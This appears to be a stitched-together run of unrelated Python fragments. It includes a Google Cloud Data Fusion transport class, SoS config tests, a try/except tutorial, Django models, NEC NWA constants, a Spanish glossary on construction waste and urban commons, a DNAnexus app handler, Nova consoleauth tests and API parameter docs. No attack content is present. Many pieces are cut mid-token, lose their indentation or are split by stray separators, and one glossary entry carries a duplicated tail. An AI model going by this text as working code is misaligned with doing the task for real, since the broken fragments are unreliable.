    DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
        gapic_version=pkg_resources.get_distribution(
            "google-cloud-data-fusion",
        ).version,
    )
except pkg_resources.DistributionNotFound:
    # Package metadata unavailable (e.g. running from source); use defaults.
    DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo()
class DataFusionTransport(abc.ABC):
    """Abstract transport class for DataFusion."""
    # OAuth scopes requested when credentials are resolved in __init__.
    AUTH_SCOPES = ("https://www.googleapis.com/auth/cloud-platform",)
    # Default API endpoint; ":443" is appended in __init__ if no port given.
    DEFAULT_HOST: str = "datafusion.googleapis.com"
    def __init__(
        self,
        *,
        host: str = DEFAULT_HOST,
        credentials: Optional[ga_credentials.Credentials] = None,
        credentials_file: Optional[str] = None,
        scopes: Optional[Sequence[str]] = None,
        quota_project_id: Optional[str] = None,
        client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
        always_use_jwt_access: Optional[bool] = False,
        **kwargs,
    ) -> None:
        """Instantiate the transport.
        Args:
            host (Optional[str]):
                 The hostname to connect to.
            credentials (Optional[google.auth.credentials.Credentials]): The
                authorization credentials to attach to requests. These
                credentials identify the application to the service; if none
                are specified, the client will attempt to ascertain the
                credentials from the environment.
            credentials_file (Optional[str]): A file with credentials that can
                be loaded with :func:`google.auth.load_credentials_from_file`.
                This argument is mutually exclusive with credentials.
            scopes (Optional[Sequence[str]]): A list of scopes.
            quota_project_id (Optional[str]): An optional project to use for billing
                and quota.
            client_info (google.api_core.gapic_v1.client_info.ClientInfo):
                The client info used to send a user-agent string along with
                API requests. If ``None``, then default info will be used.
                Generally, you only need to set this if you're developing
                your own client library.
            always_use_jwt_access (Optional[bool]): Whether self signed JWT should
                be used for service account credentials.
        """
        # Save the hostname. Default to port 443 (HTTPS) if none is specified.
        if ":" not in host:
            host += ":443"
        self._host = host
        scopes_kwargs = {"scopes": scopes, "default_scopes": self.AUTH_SCOPES}
        # Save the scopes.
        self._scopes = scopes
        # If no credentials are provided, then determine the appropriate
        # defaults.
        if credentials and credentials_file:
            raise core_exceptions.DuplicateCredentialArgs(
                "'credentials_file' and 'credentials' are mutually exclusive"
            )
        # Resolution order: explicit file, then explicit object, then ADC.
        if credentials_file is not None:
            credentials, _ = google.auth.load_credentials_from_file(
                credentials_file, **scopes_kwargs, quota_project_id=quota_project_id
            )
        elif credentials is None:
            credentials, _ = google.auth.default(
                **scopes_kwargs, quota_project_id=quota_project_id
            )
        # If the credentials are service account credentials, then always try to use self signed JWT.
        # hasattr() guards against older google-auth versions lacking the method.
        if (
            always_use_jwt_access
            and isinstance(credentials, service_account.Credentials)
            and hasattr(service_account.Credentials, "with_always_use_jwt_access")
        ):
            credentials = credentials.with_always_use_jwt_access(True)
        # Save the credentials.
        self._credentials = credentials
def _prep_wrapped_messages(self, client_info):
# Precompute the wrapped methods.
self._wrapped_methods = {
self.list_available_versions: gapic_v1.method.wrap_method(
self.list_available_versions,
default_timeout=None,
client_info=client_info,
),
self.list_instances: gapic_v1.method.wrap_method(
self.list_instances, default_timeout=None, client_info=client_info,
),
self.get_instance: gapic_v1.method.wrap_method(
self.get_instance, default_timeout=None, client_info=client_info,
),
self.create_instance: gapic_v1.method.wrap_method(
self.create_instance, default_timeout=None, client_info=client_info,
),
self.delete_instance: gapic_v1.method.wrap_method(
self.delete_instance, default_timeout=None, client_info=client_info,
),
self.update_instance: gapic_v1.method.wrap_method(
self.update_instance, default_timeout=None, client_info=client_info,
),
self.restart_instance: gapic_v1.method.wrap_method(
self.restart_instance, default_timeout=None, client_info=client_info,
),
}
    def close(self):
        """Closes resources associated with the transport.
        .. warning::
            Only call this method if the transport is NOT shared
            with other clients - this may cause errors in other clients!
        """
        raise NotImplementedError()
    @property
    def operations_client(self):
        """Return the client designed to process long-running operations."""
        raise NotImplementedError()
    # Abstract RPC accessors: each returns the callable for one API method.
    # The Union return types cover both synchronous transports (plain
    # responses) and asynchronous ones (awaitables).
    @property
    def list_available_versions(
        self,
    ) -> Callable[
        [datafusion.ListAvailableVersionsRequest],
        Union[
            datafusion.ListAvailableVersionsResponse,
            Awaitable[datafusion.ListAvailableVersionsResponse],
        ],
    ]:
        raise NotImplementedError()
    @property
    def list_instances(
        self,
    ) -> Callable[
        [datafusion.ListInstancesRequest],
        Union[
            datafusion.ListInstancesResponse,
            Awaitable[datafusion.ListInstancesResponse],
        ],
    ]:
        raise NotImplementedError()
    @property
    def get_instance(
        self,
    ) -> Callable[
        [datafusion.GetInstanceRequest],
        Union[datafusion.Instance, Awaitable[datafusion.Instance]],
    ]:
        raise NotImplementedError()
    @property
    def create_instance(
        self,
    ) -> Callable[
        [datafusion.CreateInstanceRequest],
        Union[operations_pb2.Operation, Awaitable[operations_pb2.Operation]],
    ]:
        raise NotImplementedError()
    @property
    def delete_instance(
        self,
    ) -> Callable[
        [datafusion.DeleteInstanceRequest],
        Union[operations_pb2.Operation, Awaitable[operations_pb2.Operation]],
    ]:
        raise NotImplementedError()
    @property
    def update_instance(
        self,
    ) -> Callable[
        [datafusion.UpdateInstanceRequest],
        Union[operations_pb2.Operation, Awaitable[operations_pb2.Operation]],
    ]:
        raise NotImplementedError()
@property
def restart_inst |
#!/usr/bin/env python3
#
# Copyright (c) Bo Peng and the University of Texas MD Anderson Cancer Center
# Distributed under the terms of the 3-clause BSD License.
import os
import getpass
import subprocess
import pytest
from sos import execute_workflow
from sos._version import __version__
from sos.utils import env, load_config_files
from sos.eval import get_config
# if the test is imported under sos/test, test interactive executor
test_cfg = '''
cut: 0.5
cut1:
- 0.5
- 2
- 3
cut2: a3
cut3:
- a
- b
- c
cut4:
A: 123
me: '{user_name}@my'
'''
def test_command_line():
    '''Test command line arguments'''
    # Every invocation must exit 0; output is discarded.
    commands = [
        'sos config -h',
        'sos config -g --get',
        'sos config',
        'sos config --get',
        'sos config -g --set a 5',
        'sos config --get a',
        'sos config -g --unset a',
    ]
    for cmd in commands:
        assert subprocess.call(
            cmd,
            stderr=subprocess.DEVNULL,
            stdout=subprocess.DEVNULL,
            shell=True) == 0
def test_config_set(config_factory):
    '''Test interpolation of config'''
    myconfig = config_factory(test_cfg)
    # (arguments to --set, key to read back, expected parsed value)
    cases = [
        ('cut 0.5', 'cut', 0.5),
        ('cut1 0.5 2 3', 'cut1', [0.5, 2, 3]),
        ('cut2 a3', 'cut2', 'a3'),
        ('cut3 a b c', 'cut3', ['a', 'b', 'c']),
        ('''cut4 "{'A': 123}"''', 'cut4', {'A': 123}),
    ]
    for set_args, key, expected in cases:
        assert subprocess.call(
            f'sos config --set {set_args} -c {myconfig}',
            stderr=subprocess.DEVNULL,
            stdout=subprocess.DEVNULL,
            shell=True) == 0
        # Reload and verify the value was persisted with the right type.
        load_config_files(myconfig)
        assert env.sos_dict['CONFIG'][key] == expected
def test_interpolate(config_factory):
    '''Test interpolation of config'''
    myconfig = config_factory(test_cfg)
    # Store a value containing a literal {user_name} placeholder.
    set_cmd = f'''sos config --set me '{{user_name}}@my' -c {myconfig}'''
    assert subprocess.call(
        set_cmd,
        stderr=subprocess.DEVNULL,
        stdout=subprocess.DEVNULL,
        shell=True) == 0
    load_config_files(myconfig, default_config_files=False)
    # The placeholder is expanded to the lower-cased login name on read.
    expected = f'{getpass.getuser().lower()}@my'
    assert get_config('me') == expected
def test_global_vars(config_factory):
    '''Test SoS defined variables'''
    # Even a dryrun populates the global sos_dict.
    execute_workflow("[0]", options={'mode': 'dryrun'})
    assert env.sos_dict['SOS_VERSION'] == __version__
    assert isinstance(env.sos_dict['CONFIG'], dict)
    # Values from a user-supplied config file are merged into CONFIG.
    cfg = config_factory({'my_config': 5})
    execute_workflow("[0]", options={'config_file': cfg})
    assert env.sos_dict['CONFIG']['my_config'] == 5
def test_get_config(config_factory):
    '''get_config resolves nested keys, dotted names and interpolation.'''
    cfg_file = config_factory({
        'val': 5,
        'A': {
            'B.C': '33',
            'B.C1': {
                'D': '34'
            },
            'D': '45'
        },
        'E': {
            'F': {
                'val': 6,
                'val1': 10,
                'G': '{val + val1}'
            },
            'H': '{val}'
        },
        'O': 'A{nonexisting}',
        'X': '{os.environ.get("HOME", "no_home")}'
    })
    load_config_files(cfg_file)
    # Nested keys can be addressed by components, dotted string, or list.
    assert get_config('A', 'D') == '45'
    assert get_config('A.D') == '45'
    assert get_config(['A', 'D']) == '45'
    assert get_config(['A', 'D']) == '45'
    # Dotted lookups also traverse keys that themselves contain dots.
    assert get_config('A.B.C') == '33'
    assert get_config('A.B.C1.D') == '34'
    assert get_config('A') == {'B.C': '33', 'B.C1': {'D': '34'}, 'D': '45'}
    # Interpolation draws on sibling values unless overridden by kwargs
    # or an override dict; allowed_keys filters the returned mapping.
    assert get_config('E.F') == {'val': 6, 'val1': 10, 'G': '16'}
    assert get_config('E.F', val=7) == {'val': 6, 'val1': 10, 'G': '17'}
    assert get_config('E.F', val=7, allowed_keys=['G']) == {'G': '17'}
    assert get_config(
        'E.F', val=7, val1=20) == {
            'val': 6,
            'val1': 10,
            'G': '27'
        }
    assert get_config('E.F', {
        'val': 8,
        'val1': 30
    }) == {
        'val': 6,
        'val1': 10,
        'G': '38'
    }
    assert get_config('E.H', val=7) == '7'
    # An unresolvable placeholder raises unless a value is supplied.
    with pytest.raises(ValueError):
        get_config('O')
    assert get_config('O', nonexisting=7) == 'A7'
    assert get_config('X') == os.environ.get("HOME", "no_home")
|
#!/usr/bin/python3
'''
TRY Exception
SYNTAX
-----------------------------------------------------------------
try:
You do your operations here;
......................
except ExceptionI:
If there is ExceptionI, then execute this block.
except ExceptionII:
If there is Ex | ceptionII, then execute this block.
......................
else:
If there is no exception then execute this block.
'''
# try:
# fh = open("testfile","w")
# fh.write("This is my test file for exception handling!!")
# except IOError:
# | print("Error: can\'t find file or read data")
# else:
# print("Written content in the file successfully")
# fh.close()
# Demonstrates the except path: "testfile" is opened read-only, so write()
# raises io.UnsupportedOperation, which subclasses OSError/IOError and is
# therefore caught below (as is FileNotFoundError if the file is missing).
try:
    fh = open("testfile","r")
    fh.write("This is my test file for exception handling!!")
except IOError:
    # Fixed typo in the message ("cant't" -> "can't").
    print("Error: can't find file or read data")
else:
    print("Written content in the file successfully")
    # Close the handle on the success path (it was previously leaked).
    fh.close()
|
from django.utils.translation import ugettext_lazy as _
from keops.db import models
# (stored value, translated label) choices shared by TaskType.status and
# Task.status.
STATUS = (
    ('draft', _('Draft')),
    ('open', _('In Progress')),
    ('pending', _('Pending')),
    ('done', _('Done')),
    ('cancelled', _('Cancelled'))
)
class Category(models.Model):
    # Unique, required category label.
    # NOTE(review): stock Django CharField requires max_length; presumably
    # keops.db.models.CharField supplies a default -- confirm.
    name = models.CharField(null=False, unique=True)
class TaskType(models | .Model):
name = models.CharField(unique=True, null=False)
description = models.TextField()
status = models.CharField(max_length=16, choices=STATUS)
class Meta:
db_table = 'project_task_type'
class Project(models.Model):
    # Responsible user; the string reference avoids importing the base
    # app's model at module load time.
    manager = models.ForeignKey('base.User')
class Task(models.Model):
    # Indexed for fast lookup by name.
    name = models.CharField(max_length=128, db_index=True)
    description = models.TextField()
    # One of the module-level STATUS choices.
    status = models.CharField(max_length=16, choices=STATUS)
|
# Copyright 2 | 015-2016 NEC Corporation. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unle | ss required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# NWA device type identifiers.
NWA_DEVICE_GDV = "GeneralDev"
NWA_DEVICE_TFW = "TenantFW"
# Messaging topic and display type for the NWA agent.
NWA_AGENT_TOPIC = 'nwa_agent'
NWA_AGENT_TYPE = 'NEC NWA Agent'
NWA_FIREWALL_PLUGIN = 'NECNWAFWaaS'
# an incremental size if the remaining size is zero.
NWA_GREENPOOL_ADD_SIZE = 32
|
de la lista europea de residuos publicada en el BOE No 43, de 19 de Febrero de 2002 y corregida en el BOE 61, de 12 de marzo del 2002.'),
},
{
'term' : _('Derribo'),
'text' : _('Destrucción deliberada de elementos verticales, muros o edificios.'),
},
{
'term' : _('Desconstrucción'),
'text' : _('Proceso que contiene los siguientes subprocesos: descontaminación, desmontaje, demolición, valorización en la obra, reciclaje de RCD.'),
},
{
'term' : _('Demolición'),
'text' : _('Eliminar de manera controlada una estructura o una parte de esta. Es la combinación de derribo y desmontaje controlado con el fin de eliminar un edificio o parte de este. A diferencia del derribo, la demolición es Segura, Controlada, Selectiva y Precisa.'),
},
{
'term' : _('Descontaminación'),
'text' : _('Eliminación del edificio a demoler la sustancia o sustancias que contaminan o pueden contaminar el medio.'),
},
{
'term' : _('Desmontaje'),
'text' : _('Operación de separar las partes o las piezas, que forman un todo.'),
},
{
'term' : _('Entidades locales'),
'text' : _('Son Entidades Locales o Administraciones públicas de carácter territorial local: El Municipio, la Provincia y la Isla (en los archipiélagos balear y canario), (art. 1.2 LBRL).'),
},
{
'term' : _('Entidad privada sin ánimo de lucro'),
'text' : _('Entidad cuyo fin no es la consecución de un beneficio económico. Suelen tener la figura jurídica de asociación, fundación, mutualidad o cooperativa (las cooperativas pueden tener o carecer de ánimo de lucro), y donde el eventual excedente de su actividad se reinvierte en los fines que tiene por objeto en sus estatutos.'),
},
{
'term' : _('Municipio'),
'text' : _('Entidad local básica de la organización territorial del estado y cauce inmediato de participación ciudadana en los asuntos públicos, que institucionaliza y gestiona con autonomía los intereses propios de las correspondientes colectividades (art. 1.1 LBRL).'),
},
{
'term' : _('Oneroso'),
'text' : _('No gratuito, que exige alguna contraprestación.'),
},
{
'term' : _('Valorización'),
'text' : _('Proceso para volver a hacer útil un residuo o un componente de un residuo.'),
},
{
'term' : _('RCD'),
'text' : _('Residuo producto de una construcción o demolición.'),
},
{
'term' : _('Reutilizar'),
'text' : _('Emplear de manera útil un material simple o compuesto, utilizado anteriormente, con posibilidades de cambiar su uso, sus características o su ubicación.'),
},
{
'term' : _('Reciclar'),
'text' : _('Procesar un material para ser reutilizado, no necesariamente en su forma original.'),
},
{
'term' : _('Recurso'),
'text' : _('Conjunto de elementos disponibles para resolver una necesidad.'),
},
{
'term' : _('Residuo'),
'text' : _('Aquéllo que resta de un todo después de sustraer una o más partes. Aquello que resulta de la descomposición o destrucción de algo.'),
},
{
'term' : _('Residuo primario'),
'text' : _('Residuo antes de estudiar las posibilidades que ofrece de tratamiento para dejar de ser un residuo.'),
},
{
'term' : _('Subproducto'),
'text' : _('Residuos que se pueden utilizar directamente como primeras materias otras producciones o como sustituto de productos comerciales y que son recuperables sin necesidad de someterlos a operaciones de tratamiento.'),
},
],
'commons' : [
{
'term' : _('Bienes comunes urbanos'),
'text' : _('aquellos bienes materiales, inmateriales y/o digitales, que los Ciudadanos y la Administración, incluidos aquellos realizados a través de procedimientos participativos y deliberativos, reconocen como funcionales para el bienestar individual y colectivo.'),
},
{
'term' : _('Ciudadanos activos'),
'text' : _('Todos los sujetos, individuos, asociaciones o cualquier otro colectivo, también en forma de negocio u organización social, que actúen en favor del cuidado y regeneración de los bienes comunes urbanos.'),
},
{
'term' : _('Propuesta de colaboración'),
'text' : _('La manifestación de interés, formulada por los ciudadanos activos, cuya finalidad es la intervención de cuidado y regeneración de los bienes comunes urbanos. La propuesta puede ser espontánea o en respuesta a una solicitud formulada por el Ayuntamiento.'),
},
{
'term' : _('Acuerdo de colaboración'),
'text' : _('El pacto a través del cual el Ayuntamiento o la entidad privada y los ciudadanos activos definen el alcance de las intervenciones de cuidado y regeneración de los bienes comunes urbanos.'),
},
{
'term' : _('Intervenciones de cuidado'),
'text' : _('Intervenciones orientadas a la protección, conservación y mantenimiento de los bienes comunes urbanos para garantizar y mejorar su facilidad de uso y calidad.os, reconocen como funcionales para el bienestar individual y colectivo.'),
},
{
'term' : _('Gestión compartida'),
'text' : _('Aquellas intervenciones de cuidado de bienes comunes urbanos realizadas conjuntamente por los Ciudadanos y la Administración con carácter de continuidad e inclusión.'),
},
{
'term' : _('Intervenciones de regeneración'),
'text' : _('Trabajos de restauración, transformación e innovaci | ón de los bienes comunes, realizados a través de métodos de co-diseño e integrados con procesos sociales, económicos, tecnológicos y ambientales, que en su conjunto tienen un impacto en la me | jora de la calidad de vida del ciudadano.'),
},
{
'term' : _('Espacios públicos'),
'text' : _('Zonas verdes, plazas, calles, aceras y otros espacios públicos o abiertos al público, de propiedad o de uso público.'),
},
{
'term' : _('Confianza mutua'),
'text' : _('Sin perjuicio de las prerrogativas de supervisión pública, planificación y verificación, la Administración y los ciudadanos activos abordarán su relación desde la confianza mutua y asumiendo que la respectiva cooperación voluntaria se orienta a la consecución de fines de interés general.'),
},
{
'term' : _('Publicidad y transparencia'),
'text' : _('La administración garantizará la máxima difusión de oportunidades de colaboración, propuestas recibidas, ayudas concedidas, decisiones tomadas y resultados de las evaluaciones realizadas. Se reconocerá la transparencia como el principal instrumento para garantizar la igualdad en las relaciones con los ciudadanos activos.'),
},
{
'term' : _('Responsabilidades'),
'text' : _('La administración valorará la responsabilidad propia y de los ciudadanos como un elemento central en la relación con los ciudadanos, así como una condición indispensable para que la colaboración resulte efectivamente enfocada a la producción de resultados útiles y mensurables.'),
},
{
'term' : _('Inclusión'),
'text' : _('Las intervenciones |
ias* has default value "default".
'''
self._dxid = None
self._name = None
self._alias = None
if dxid is not None:
if name is not None or alias is not None:
raise DXError("Did not expect name or alias to be given if dxid is given")
verify_string_dxid(dxid, self._class)
self._dxid = dxid
elif name is not None:
self._name = name
if not isinstance(name, basestring):
raise DXError("App name needs to be a string: %r" % (name,))
if alias is not None:
if not isinstance(alias, basestring):
raise DXError("App alias needs to be a string: %r" % (alias,))
self._alias = alias
else:
self._alias = 'default'
def get_id(self):
'''
:returns: Object ID of associated app
:rtype: string
Returns the object ID of the app that the handler is currently
associated with.
'''
if self._dxid is not None:
return self._dxid
else:
return 'app-' + self._name + '/' + self._alias
    def new(self, **kwargs):
        '''
        :param initializeFrom: ID of an existing app object from which to initialize the app
        :type initializeFrom: string
        :param applet: ID of the applet that the app will be created from
        :type applet: string
        :param name: Name of the app (inherits from *initializeFrom* if possible)
        :type name: string
        :param title: Title or brand name of the app (optional)
        :type title: string
        :param summary: A short description of the app (optional)
        :type summary: string
        :param description: An extended description of the app (optional)
        :type description: string
        :param details: Arbitrary JSON to be associated with the app (optional)
        :type details: dict or list
        :param version: Version number
        :type version: string
        :param bill_to: ID of the user or organization who will own the app and be billed for its space usage (optional if an app with this name already exists)
        :type bill_to: string
        :param access: Access specification (optional)
        :type access: dict
        :param resources: Specifies what is to be put into the app's resources container. Must be a string containing a project ID, or a list containing object IDs. (optional)
        :type resources: string or list
        .. note:: It is highly recommended that the higher-level module
           :mod:`dxpy.app_builder` or (preferably) its frontend `dx build --create-app
           <https://wiki.dnanexus.com/Command-Line-Client/Index-of-dx-Commands#build>`_
           be used instead for app creation.
        Creates an app with the given parameters by using the specified
        applet or app as a base and overriding its attributes. See the
        API documentation for the `/app/new
        <https://wiki.dnanexus.com/API-Specification-v1.0.0/Apps#API-method%3A-%2Fapp%2Fnew>`_
        method for more info.
        Exactly one of *initializeFrom* and *applet* must be provided.
        The app is only available to its developers until
        :meth:`publish()` is called, and is not run until :meth:`run()`
        is called.
        '''
        # Build the /app/new payload in dx_hash; anything left in kwargs
        # afterwards is forwarded to the API call itself.
        dx_hash = {}
        if 'applet' not in kwargs and 'initializeFrom' not in kwargs:
            raise DXError("%s: One of the keyword arguments %s and %s is required" % (self.__class__.__name__, 'applet', 'initializeFrom'))
        # 'version' is mandatory; move it from kwargs into the payload.
        for field in ['version']:
            if field not in kwargs:
                raise DXError("%s: Keyword argument %s is required" % (self.__class__.__name__, field))
            dx_hash[field] = kwargs[field]
            del kwargs[field]
        # Optional fields are copied through verbatim when present.
        # NOTE(review): 'billing' is accepted here but not documented in the
        # docstring above, while 'bill_to' is translated to 'billTo' below --
        # confirm both spellings are intended.
        for field in 'initializeFrom', 'applet', 'name', 'title', 'summary', 'description', 'billing', 'access', 'resources':
            if field in kwargs:
                dx_hash[field] = kwargs[field]
                del kwargs[field]
        if "bill_to" in kwargs:
            dx_hash['billTo'] = kwargs['bill_to']
            del kwargs["bill_to"]
        resp = dxpy.api.app_new(dx_hash, **kwargs)
        # Bind this handler to the freshly created app.
        self.set_id(dxid=resp["id"])
def describe(self, fields=None, **kwargs):
'''
:param fields: Hash where the keys are field names that should be returned, and values should be set to True (default is that all fields are returned)
:type fields: dict
:returns: Description of the remote app object
:rtype: dict
Returns a dict with a description of the app. The result
includes the key-value pairs as specified in the API
documentation for the `/app-xxxx/describe
<https://wiki.dnanexus.com/API-Specification-v1.0.0/Apps#API-method%253A-%252Fapp-xxxx%255B%252Fyyyy%255D%252Fdescribe>`_
method.
'''
describe_input = {}
if fields:
describe_input['fields'] = fields
if self._dxid is not None:
self._desc = dxpy.api.app_describe(self._dxid, input_params=describe_input, **kwargs)
else:
self._desc = dxpy.api.app_describe('app-' + self._name, alias=self._alias,
input_params=describe_input, **kwargs)
return self._desc
def update(self, **kwargs):
'''
:param applet: ID of the applet to replace the app's contents with
:type applet: string
:param details: Metadata to store with the app (optional)
:type details: dict or list
:param access: Access specification (optional)
:type access: dict
:param resources: Specifies what is to be put into the app's resources container. Must be a string containing a project ID, or a list containing object IDs. (optional)
:type resources: string or list
Updates the parameters of an existing app. See the API
documentation for the `/app/update
<https://wiki.dnanexus.com/API-Specification-v1.0.0/Apps#API-method%253A-%252Fapp-xxxx%255B%252Fyyyy%255D%252Fupdate>`_
method for more info.
The current user must be a developer of the app.
'''
updates = {}
for field in 'applet', 'billing', 'access', 'resources', 'details':
if field in kwargs:
updates[field] = kwargs[field]
del kwargs[field]
if self._dxid is not None:
resp = dxpy.api.app_update(self._dxid, input_params=updates, **kwargs)
else:
resp = dxpy.api.app_update('app-' + self._name, alias=self._alias,
input_params=updates, **kwargs)
def add_tags(self, tags, **kwargs):
"""
:param tags: Tags to add to the app
:type tags: array
Adds the specified application name tags (aliases) to this app.
The current user must be a developer of the app.
"""
if self._dxid is not None:
return dxpy.api.app_add_tags(self._dxid, input_params={"tags": tags}, **kwargs)
else:
return dxpy.api.app_add_tags('app-' + self._name, alias=self._alias,
input_params={"tags": tags}, **kwargs)
    def addTags(self, tags, **kwargs):
        """
        .. deprecated:: 0.72.0
           Use :meth:`add_tags()` instead.
        """
        # Thin pass-through kept only for backward compatibility.
        return self.add_tags(tags, **kwargs)
def remove_tags(self, tags, **kwargs):
"""
:param tags: Tags to remove from the app
:type tags: array
Removes the specified application name tags (aliases) from this
app, so that it is no longer addressable by those aliases.
The current user must be a developer of the app.
"""
if self._dxid is not None:
return dxpy.api.app_remove_tags(self._dxid, input_params={"tags": tags}, **kwargs)
else:
return dxpy.api.app_remove_tags('app-' + self._name, alias=self._alias,
input_params={"tags": tags}, **kwar |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 OpenStack Foundation
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file | except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache. | org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Tests for Consoleauth Code.
"""
import mox
from nova.consoleauth import manager
from nova import context
from nova import db
from nova.openstack.common import timeutils
from nova import test
class ConsoleauthTestCase(test.TestCase):
"""Test Case for consoleauth."""
def setUp(self):
super(ConsoleauthTestCase, self).setUp()
self.manager = manager.ConsoleAuthManager()
self.context = context.get_admin_context()
self.instance = db.instance_create(self.context, {})
def test_tokens_expire(self):
# Test that tokens expire correctly.
self.useFixture(test.TimeOverride())
token = u'mytok'
self.flags(console_token_ttl=1)
self._stub_validate_console_port(True)
self.manager.authorize_console(self.context, token, 'novnc',
'127.0.0.1', '8080', 'host',
self.instance['uuid'])
self.assertTrue(self.manager.check_token(self.context, token))
timeutils.advance_time_seconds(1)
self.assertFalse(self.manager.check_token(self.context, token))
def _stub_validate_console_port(self, result):
def fake_validate_console_port(ctxt, instance, port, console_type):
return result
self.stubs.Set(self.manager.compute_rpcapi,
'validate_console_port',
fake_validate_console_port)
def test_multiple_tokens_for_instance(self):
tokens = [u"token" + str(i) for i in xrange(10)]
self._stub_validate_console_port(True)
for token in tokens:
self.manager.authorize_console(self.context, token, 'novnc',
'127.0.0.1', '8080', 'host',
self.instance['uuid'])
for token in tokens:
self.assertTrue(self.manager.check_token(self.context, token))
def test_delete_tokens_for_instance(self):
tokens = [u"token" + str(i) for i in xrange(10)]
for token in tokens:
self.manager.authorize_console(self.context, token, 'novnc',
'127.0.0.1', '8080', 'host',
self.instance['uuid'])
self.manager.delete_tokens_for_instance(self.context,
self.instance['uuid'])
stored_tokens = self.manager._get_tokens_for_instance(
self.instance['uuid'])
self.assertEqual(len(stored_tokens), 0)
for token in tokens:
self.assertFalse(self.manager.check_token(self.context, token))
def test_wrong_token_has_port(self):
token = u'mytok'
self._stub_validate_console_port(False)
self.manager.authorize_console(self.context, token, 'novnc',
'127.0.0.1', '8080', 'host',
instance_uuid=self.instance['uuid'])
self.assertFalse(self.manager.check_token(self.context, token))
def test_console_no_instance_uuid(self):
self.manager.authorize_console(self.context, u"token", 'novnc',
'127.0.0.1', '8080', 'host',
instance_uuid=None)
self.assertFalse(self.manager.check_token(self.context, u"token"))
    def test_delete_expired_tokens(self):
        # Storing a new token for an instance should purge any expired
        # tokens from that instance's token list.
        self.useFixture(test.TimeOverride())
        token = u'mytok'
        self.flags(console_token_ttl=1)
        self._stub_validate_console_port(True)
        self.manager.authorize_console(self.context, token, 'novnc',
                                       '127.0.0.1', '8080', 'host',
                                       self.instance['uuid'])
        timeutils.advance_time_seconds(1)
        # TTL elapsed: the first token no longer validates.
        self.assertFalse(self.manager.check_token(self.context, token))
        token1 = u'mytok2'
        self.manager.authorize_console(self.context, token1, 'novnc',
                                       '127.0.0.1', '8080', 'host',
                                       self.instance['uuid'])
        stored_tokens = self.manager._get_tokens_for_instance(
            self.instance['uuid'])
        # when trying to store token1, expired token is removed first.
        self.assertEqual(len(stored_tokens), 1)
        self.assertEqual(stored_tokens[0], token1)
class ControlauthMemcacheEncodingTestCase(test.TestCase):
    """Verify cache keys handed to memcache are `str`, not unicode.

    The ``mox.IsA(str)`` matchers assert that the manager encodes the
    unicode token / instance ids before using them as cache keys
    (presumably because the memcache client requires byte-string keys --
    confirm against the ConsoleAuthManager implementation).
    """
    def setUp(self):
        super(ControlauthMemcacheEncodingTestCase, self).setUp()
        self.manager = manager.ConsoleAuthManager()
        self.context = context.get_admin_context()
        # Deliberately unicode inputs; the tests verify they get encoded.
        self.u_token = u"token"
        self.u_instance = u"instance"
    def test_authorize_console_encoding(self):
        # Expect: token entry set, instance token-list fetched, then the
        # updated token list set -- all under `str` keys.
        self.mox.StubOutWithMock(self.manager.mc, "set")
        self.mox.StubOutWithMock(self.manager.mc, "get")
        self.manager.mc.set(mox.IsA(str), mox.IgnoreArg(), mox.IgnoreArg()
                            ).AndReturn(True)
        self.manager.mc.get(mox.IsA(str)).AndReturn(None)
        self.manager.mc.set(mox.IsA(str), mox.IgnoreArg()).AndReturn(True)
        self.mox.ReplayAll()
        self.manager.authorize_console(self.context, self.u_token, 'novnc',
                                       '127.0.0.1', '8080', 'host',
                                       self.u_instance)
    def test_check_token_encoding(self):
        # check_token must look the token up under a `str` key.
        self.mox.StubOutWithMock(self.manager.mc, "get")
        self.manager.mc.get(mox.IsA(str)).AndReturn(None)
        self.mox.ReplayAll()
        self.manager.check_token(self.context, self.u_token)
    def test_delete_tokens_for_instance_encoding(self):
        # Expect: fetch the instance's token list, then delete each token
        # entry and the list itself -- all under `str` keys.
        self.mox.StubOutWithMock(self.manager.mc, "delete")
        self.mox.StubOutWithMock(self.manager.mc, "get")
        self.manager.mc.get(mox.IsA(str)).AndReturn('["token"]')
        self.manager.mc.delete(mox.IsA(str)).AndReturn(True)
        self.manager.mc.delete(mox.IsA(str)).AndReturn(True)
        self.mox.ReplayAll()
        self.manager.delete_tokens_for_instance(self.context, self.u_instance)
class CellsConsoleauthTestCase(ConsoleauthTestCase):
    """Test Case for consoleauth w/ cells enabled."""
    def setUp(self):
        super(CellsConsoleauthTestCase, self).setUp()
        self.flags(enable=True, group='cells')
    def _stub_validate_console_port(self, result):
        """Stub the cells RPC port check (note: different signature than
        the compute RPC variant stubbed by the parent class)."""
        self.stubs.Set(
            self.manager.cells_rpcapi, 'validate_console_port',
            lambda ctxt, instance_uuid, console_port, console_type: result)
|
if comma delimited string is passed, and it must contain an even number of values.
:type op_Timestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_Timestamp: If op_Timestamp is specified, the field named in this input will be compared to the value in Timestamp using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_Timestamp must be specified if op_Timestamp is specified.
:type val_f_Timestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_Timestamp: If op_Timestamp is specified, this value will be compared to the value in Timestamp using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_Timestamp must be specified if op_Timestamp is specified.
:type val_c_Timestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
